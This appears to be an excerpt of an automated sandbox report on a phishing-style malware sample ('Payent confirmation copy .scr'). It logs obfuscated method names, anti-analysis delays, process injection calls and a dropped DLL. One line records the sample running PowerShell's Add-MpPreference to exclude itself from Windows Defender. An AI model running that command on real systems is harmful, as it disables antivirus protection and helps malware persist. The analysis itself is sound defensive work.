Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, efV8jdshvdLqdLIF0VS.cs High entropy of concatenated method names: 'ToString', 'iElLCEHUA1', 'zeBLR5VhFg', 'shxLNlnAGt', 'NYPLanXipe', 'i8iLqTZGRp', 'r4ZLsvOYNU', 'b5lLiNcS0j', 'jQx6AwpKiyP9G33p797', 'XHI2JJp9YxkiwfATQZY'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs High entropy of concatenated method names: 'bRddkoH7av', 'L2idVtbWQd', 'gNZdWqma8P', 'aJRdxEUbkS', 'hDNdnvmQ4x', 'O7IdQhKCTe', 'V12dbajUP7', 'PPbdvX4XPq', 'HZndyEsBd7', 'N3EdlWxyoL'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, QE5OneWd920YCRlW4g.cs High entropy of concatenated method names: 'N7L3bh76XB', 'jYv3vs1yKD', 'rji3locMM5', 'pwM3DQ1gi3', 'lnM3GXMb6n', 'aiq3c3unL2', 'xHRENDytCIP9tFj3Ja', 'RWPXjyEHkXw3d58QGm', 'A0e33CNsxb', 'NKd3d1rIWu'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, FPx2LFNdTv2kEAw824.cs High entropy of concatenated method names: 'tGKbVo0Kv9', 'loXbxePUbi', 'AVxbQ0gUgn', 'ffPQgATI7J', 'S2bQzjFGFF', 'm0IbYNZxl6', 'ChMb3NQ6QL', 'yvFbJucTnx', 'cvubdQtUwJ', 'xJjboCSjLT'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, Ac7xW4lpX9vRqwB4M6.cs High entropy of concatenated method names: 'bYYxXRFENM', 'RM6xS4qhqO', 'D5CxCi3X5d', 'wc6xRMFT2x', 'zGlxG1AU1G', 'zUnxcq0Bvt', 'oJNx4rcAES', 'NfixHXbA6h', 'xsyx9wo0t9', 'xD6xtGgpod'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, dxEJ4JRcDccomymNei.cs High entropy of concatenated method names: 'qsGtxfD4sR', 'HGrtnkKNqb', 'iMEtQUfFdi', 'ge5tbNPT8t', 'WIgt9AGYr6', 'zVwtvSckYf', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, GT0LXboupvvgGrnSAd.cs High entropy of concatenated method names: 'FBFb7VEnng', 'yo9b68shdp', 'wLMb2k2OQo', 'SjCbX1SiOj', 'OuCbhTXv61', 'n9CbSqwMDD', 'CHhbpcV2Mh', 'GZ4bCKB3Tw', 'LjCbRW0G09', 'HJxbNJ8rpu'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, CZ3ugisWcyJYvmGu4he.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'd3TF9pTkof', 'YS6FtQxEPM', 'D4PFLE7sdd', 'REmFFYRtJH', 'pRBFm04E65', 'JrlFZcr0qs', 'wl9FKMdsBE'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, p7jRKTZMejsJHeifIa.cs High entropy of concatenated method names: 'xM24wmRAFv', 'QCj4gtaW9T', 'SeNHYhRYHV', 'doYH3VM7L4', 'bgT4e2v2Oe', 'Cc04jemCpq', 'roJ4E5JWJW', 'HUV4U2VAYx', 'fHv4PFnImL', 'VIA4BPpb61'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, EJ1ZyShAMUg15nQSfH.cs High entropy of concatenated method names: 'Hmr2HFMTe', 'IqNX3OcBH', 'NBeS1LGiJ', 'TOMpxRbML', 'tLrRefH9U', 'o8jNScjqM', 'VRmNTr9wBSgHXMV7dF', 'KAyhyiXBpXimJnGXqf', 'T0kHE5jhw', 'VgftC2ZZG'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, Qh4VL4BqVBJ9QadaTR.cs High entropy of concatenated method names: 'pR7nhZOgVQ', 'o8wnpkR2EF', 'mGbxsytUZ5', 'WFfxixkIYS', 'bUmxOynAXM', 'DQ7xfnoP0P', 'RcfxAePd03', 'GERxMLL5oQ', 'zkYxrOaG3Q', 'fuux5HaAED'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, iCErSCKyoG3WA92F9d.cs High entropy of concatenated method names: 'JnFWUNR6c4', 'STFWPpgN7e', 'MVJWBDIiQx', 'PISWT7Fs5O', 'LCbW15q6YI', 'EQXWuDtywd', 'xF1W0B9lYN', 'Jg2Ww1uIDG', 'kbVW88uiL1', 'h89WgeJSXA'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, x85usGnCwJnBeo8rDc.cs High entropy of concatenated method names: 'gZMIC6XqPj', 'tgkIReoyrr', 'FvoIa8uFvu', 'CrNIqZVXJ3', 'utQIir4t6U', 'VCpIOIBoCd', 'WCXIArtjgL', 'e4SIMUsped', 'myUI5iKDu9', 'bUFIetarx2'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, rg35JuudNuuPPIfUtX.cs High entropy of concatenated method names: 'Dispose', 'agG38UTXLa', 'ahDJqPAUtA', 'lZhF1JrQW4', 'waL3gJ6xkE', 'QhH3zxDPUe', 'ProcessDialogKey', 'aemJYptMIA', 'jRUJ3EaeDA', 'bPfJJYcU8H'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, snYq7vjt6RoVqfKG38.cs High entropy of concatenated method names: 'zvr9a3NPuV', 'UvB9qb6srq', 'mdX9siTiD7', 'Hqw9i38FRK', 'H0g9OvDBn8', 'q4I9f1WQGe', 'MxJ9AaWCsO', 'Roe9Mg2wfq', 'DmV9rGGoTp', 'Tpy95DruYV'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, mHDMjBXdZAhCJgRv98.cs High entropy of concatenated method names: 'zZqQkrKuOi', 'uvBQWXrxk4', 'HXrQnJM5HB', 'VwmQblhPQy', 'CltQva3dHH', 'Tn5n18cFOn', 'Dk3nuqhVMX', 'gQqn0WYeTd', 'kuQnwks0tZ', 'OrJn8Luj4K'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, APyjbyvbetLgTTfUX7.cs High entropy of concatenated method names: 'oyy9G4rYka', 'JTP94UICWT', 'dY199liEP1', 'Hfp9LSHDLy', 'm4e9mqGE3C', 'PU89KQ9Xik', 'Dispose', 'oiaHV2XbX6', 'kiTHW8Dyme', 'GItHx75uek'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, pNd39XzPNIQr9WNHMd.cs High entropy of concatenated method names: 'EFLtSyJiBG', 'bdPtC7rL3J', 'L74tRtBn4y', 'EWuta4rkgm', 'm9ntqB9e5w', 'thgticGRSo', 'bZ6tObvMKD', 'idgtKafOnU', 'vW1t74InP9', 'FIMt6UFtH5'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, W3xqtbssSmfMGuTvJuC.cs High entropy of concatenated method names: 'CnttgCwOv3', 'VohtzFRGDd', 'UUsLYI9iyO', 'FKhL3YaRqC', 'yXuLJAVIui', 'Yg9LdxPUxL', 'AhuLo4vnxn', 'bmYLkgm6Rk', 't3JLVOtWrf', 'aQxLW8UBMn'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, efV8jdshvdLqdLIF0VS.cs High entropy of concatenated method names: 'ToString', 'iElLCEHUA1', 'zeBLR5VhFg', 'shxLNlnAGt', 'NYPLanXipe', 'i8iLqTZGRp', 'r4ZLsvOYNU', 'b5lLiNcS0j', 'jQx6AwpKiyP9G33p797', 'XHI2JJp9YxkiwfATQZY'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs High entropy of concatenated method names: 'bRddkoH7av', 'L2idVtbWQd', 'gNZdWqma8P', 'aJRdxEUbkS', 'hDNdnvmQ4x', 'O7IdQhKCTe', 'V12dbajUP7', 'PPbdvX4XPq', 'HZndyEsBd7', 'N3EdlWxyoL'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, QE5OneWd920YCRlW4g.cs High entropy of concatenated method names: 'N7L3bh76XB', 'jYv3vs1yKD', 'rji3locMM5', 'pwM3DQ1gi3', 'lnM3GXMb6n', 'aiq3c3unL2', 'xHRENDytCIP9tFj3Ja', 'RWPXjyEHkXw3d58QGm', 'A0e33CNsxb', 'NKd3d1rIWu'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, FPx2LFNdTv2kEAw824.cs High entropy of concatenated method names: 'tGKbVo0Kv9', 'loXbxePUbi', 'AVxbQ0gUgn', 'ffPQgATI7J', 'S2bQzjFGFF', 'm0IbYNZxl6', 'ChMb3NQ6QL', 'yvFbJucTnx', 'cvubdQtUwJ', 'xJjboCSjLT'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, Ac7xW4lpX9vRqwB4M6.cs High entropy of concatenated method names: 'bYYxXRFENM', 'RM6xS4qhqO', 'D5CxCi3X5d', 'wc6xRMFT2x', 'zGlxG1AU1G', 'zUnxcq0Bvt', 'oJNx4rcAES', 'NfixHXbA6h', 'xsyx9wo0t9', 'xD6xtGgpod'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, dxEJ4JRcDccomymNei.cs High entropy of concatenated method names: 'qsGtxfD4sR', 'HGrtnkKNqb', 'iMEtQUfFdi', 'ge5tbNPT8t', 'WIgt9AGYr6', 'zVwtvSckYf', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, GT0LXboupvvgGrnSAd.cs High entropy of concatenated method names: 'FBFb7VEnng', 'yo9b68shdp', 'wLMb2k2OQo', 'SjCbX1SiOj', 'OuCbhTXv61', 'n9CbSqwMDD', 'CHhbpcV2Mh', 'GZ4bCKB3Tw', 'LjCbRW0G09', 'HJxbNJ8rpu'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, CZ3ugisWcyJYvmGu4he.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'd3TF9pTkof', 'YS6FtQxEPM', 'D4PFLE7sdd', 'REmFFYRtJH', 'pRBFm04E65', 'JrlFZcr0qs', 'wl9FKMdsBE'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, p7jRKTZMejsJHeifIa.cs High entropy of concatenated method names: 'xM24wmRAFv', 'QCj4gtaW9T', 'SeNHYhRYHV', 'doYH3VM7L4', 'bgT4e2v2Oe', 'Cc04jemCpq', 'roJ4E5JWJW', 'HUV4U2VAYx', 'fHv4PFnImL', 'VIA4BPpb61'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, EJ1ZyShAMUg15nQSfH.cs High entropy of concatenated method names: 'Hmr2HFMTe', 'IqNX3OcBH', 'NBeS1LGiJ', 'TOMpxRbML', 'tLrRefH9U', 'o8jNScjqM', 'VRmNTr9wBSgHXMV7dF', 'KAyhyiXBpXimJnGXqf', 'T0kHE5jhw', 'VgftC2ZZG'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, Qh4VL4BqVBJ9QadaTR.cs High entropy of concatenated method names: 'pR7nhZOgVQ', 'o8wnpkR2EF', 'mGbxsytUZ5', 'WFfxixkIYS', 'bUmxOynAXM', 'DQ7xfnoP0P', 'RcfxAePd03', 'GERxMLL5oQ', 'zkYxrOaG3Q', 'fuux5HaAED'
Source: C:\Windows\SysWOW64\finger.exe File created: C:\Users\user\AppData\Local\Temp\sqlite3.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\finger.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\finger.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Memory allocated: 1D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Memory allocated: 2400000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Memory allocated: 350000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Memory allocated: 7FB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Memory allocated: 8FB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Memory allocated: 91A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Memory allocated: A1A0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A80101 rdtsc 3_2_00A80101
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2586
Source: C:\Windows\SysWOW64\finger.exe Window / User API: threadDelayed 9798
Source: C:\Windows\SysWOW64\finger.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dll
Source: C:\Windows\SysWOW64\finger.exe API coverage: 2.4 %
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr TID: 3380 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3604 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3608 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\finger.exe TID: 3692 Thread sleep count: 162 > 30
Source: C:\Windows\SysWOW64\finger.exe TID: 3692 Thread sleep time: -324000s >= -30000s
Source: C:\Windows\SysWOW64\finger.exe TID: 3744 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\finger.exe TID: 3692 Thread sleep count: 9798 > 30
Source: C:\Windows\SysWOW64\finger.exe TID: 3692 Thread sleep time: -19596000s >= -30000s
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe TID: 3700 Thread sleep time: -45000s >= -30000s
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe TID: 3700 Thread sleep time: -57000s >= -30000s
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe TID: 3700 Thread sleep time: -41000s >= -30000s
Source: C:\Windows\SysWOW64\finger.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\finger.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\SysWOW64\finger.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E19A2D sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register, 6_2_61E19A2D
Source: finger.exe, 00000006.00000002.867321380.0000000003F8E000.00000004.10000000.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000002.867134338.00000000043CE000.00000004.00000001.00040000.00000000.sdmp Binary or memory string: <p><a href="https://www.star.ne.jp/"><img src="data:image/gif;base64,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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\finger.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A307AC NtCreateMutant,LdrInitializeThunk, 3_2_00A307AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A20080 mov ecx, dword ptr fs:[00000030h] 3_2_00A20080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A200EA mov eax, dword ptr fs:[00000030h] 3_2_00A200EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A426F8 mov eax, dword ptr fs:[00000030h] 3_2_00A426F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr"
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtQueryInformationProcess: Direct from: 0x774CFAFA
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe NtCreateUserProcess: Direct from: 0x774D093E
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtCreateKey: Direct from: 0x774CFB62
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtQuerySystemInformation: Direct from: 0x774D20DE
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe NtQueryDirectoryFile: Direct from: 0x774CFDBA
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtClose: Direct from: 0x774CFA02
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe NtWriteVirtualMemory: Direct from: 0x774D213E
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtCreateFile: Direct from: 0x774D00D6
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtSetTimer: Direct from: 0x774D021A
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtOpenFile: Direct from: 0x774CFD86
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtSetInformationThread: Direct from: 0x774E9893
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtOpenKeyEx: Direct from: 0x774CFA4A
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtAllocateVirtualMemory: Direct from: 0x774CFAE2
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtResumeThread: Direct from: 0x774D008D
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtOpenKeyEx: Direct from: 0x774D103A
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe NtUnmapViewOfSection: Direct from: 0x774CFCA2
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtDelayExecution: Direct from: 0x774CFDA1
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtSetInformationProcess: Direct from: 0x774CFB4A
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtSetInformationThread: Direct from: 0x774CF9CE
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtReadFile: Direct from: 0x774CF915
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtMapViewOfSection: Direct from: 0x774CFC72
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtCreateThreadEx: Direct from: 0x774D08C6
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtDeviceIoControlFile: Direct from: 0x774CF931
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtRequestWaitReplyPort: Direct from: 0x753C6BCE
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtQueryValueKey: Direct from: 0x774CFACA
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtOpenSection: Direct from: 0x774CFDEA
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtProtectVirtualMemory: Direct from: 0x774D005A
